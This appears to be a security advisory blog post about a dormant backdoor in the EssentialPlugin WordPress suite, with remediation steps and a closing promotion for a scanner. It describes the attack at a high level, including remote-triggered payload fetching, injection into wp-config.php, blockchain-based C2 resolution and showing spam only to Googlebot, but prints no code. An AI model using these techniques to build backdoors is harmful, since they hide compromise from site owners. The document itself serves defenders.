WordPress EssentialPlugin Suite Hacked to Push Malware

WordPress EssentialPlugin Backdoor Exposes Thousands of Sites

Over 30 WordPress plugins in the EssentialPlugin package have been compromised with a backdoor that allows attackers to silently inject malware into sites running them. The WordPress plugin supply chain attack affected plugins with hundreds of thousands of active installs, and the malicious code sat dormant since August 2025 before being activated recently to push spam pages, redirects, and fake content.

Austin Ginder, founder of managed WordPress host Anchor Hosting, spotted the issue after receiving a tip about suspicious third-party access code in one plugin. A deeper audit revealed the same backdoor across the entire EssentialPlugin suite, tracing back to a six-figure acquisition of the project by a new owner last year.

How the Backdoor Works

The attack chain is deceptively clean. The backdoor stayed inactive after being planted, waiting for a signal from a remote endpoint at analytics.essentialplugin.com. Once that endpoint returned a malicious serialized payload, the code fetched an external file named wp-comments-posts.php (note: not the legitimate wp-comments-post.php) and injected it into wp-config.php.

What makes this particularly nasty is the evasion strategy. The injected malware uses Ethereum-based C2 address resolution to avoid traditional domain blocklists. The spam content it serves is only shown to Googlebot, making it completely invisible to site owners during normal browsing. Administrators could have been unknowingly running SEO-poisoning malware for months without any visible symptoms.

PatchStack confirmed the backdoor would only execute if the EssentialPlugin analytics endpoint returned a specifically crafted malicious response, meaning the attacker had fine-grained control over when and where the payload activated.

What's at Risk for Developers

The blast radius here is significant. The EssentialPlugin brand (originally WP Online Support, rebranded in 2021) covers sliders, galleries, WooCommerce extensions, SEO tools, and marketing utilities. If any of those plugins are running on a client's site, the compromise potentially exposed database credentials and site configuration through wp-config.php.

WordPress.org responded by closing the affected plugins and forcing an update to neutralize the backdoor's communication path. But here's the catch: the forced update does not clean wp-config.php. Sites that were actively infected still need manual remediation. The WordPress Plugins Team also warned that the malware may exist in files beyond the known wp-comments-posts.php location, meaning a single file check is not enough.

How to Protect Your WordPress Sites

If you run any EssentialPlugin products, treat the environment as compromised until proven otherwise. These steps matter right now:

• Audit wp-config.php immediately. Look for injected code that wasn't there before, especially anything referencing external domains or serialized data.
• Search for wp-comments-posts.php. Delete it if found. It is not a legitimate WordPress core file.
• Scan all plugin files for unknown code. The malware may be hiding elsewhere. A full automated scan can surface unexpected file modifications and suspicious outbound connections.
• Check server logs for Googlebot traffic patterns. If Googlebot is hitting unusual pages, the spam injection may already be active.
• Replace affected plugins entirely. Don't just update. Remove, reinstall from a trusted source, or switch to an alternative.
• Rotate database credentials stored in wp-config.php as a precaution.

For ongoing coverage of WordPress plugin vulnerabilities, see our WordPress security blog.

FAQ

How do I know if my site was actively infected, not just vulnerable? Check wp-config.php for unfamiliar injected code and look for the file wp-comments-posts.php in your WordPress root. Also review server access logs for unusual Googlebot requests to pages that don't exist in your CMS.

Does removing the plugin remove the malware? No. The backdoor writes to wp-config.php, which persists after plugin removal. You need to manually inspect and clean that file even after deactivating or deleting the plugin.

Why did WordPress.org's forced update not fully clean infected sites? The forced update closed the communication channel and disabled the backdoor's execution path, but WordPress.org does not modify core configuration files like wp-config.php during plugin updates. That remediation has to happen manually at the server level.

Your site may still carry traces of this compromise. Run a free scan on VibeWShield to check for active backdoors, suspicious file injections, and malware-related redirects.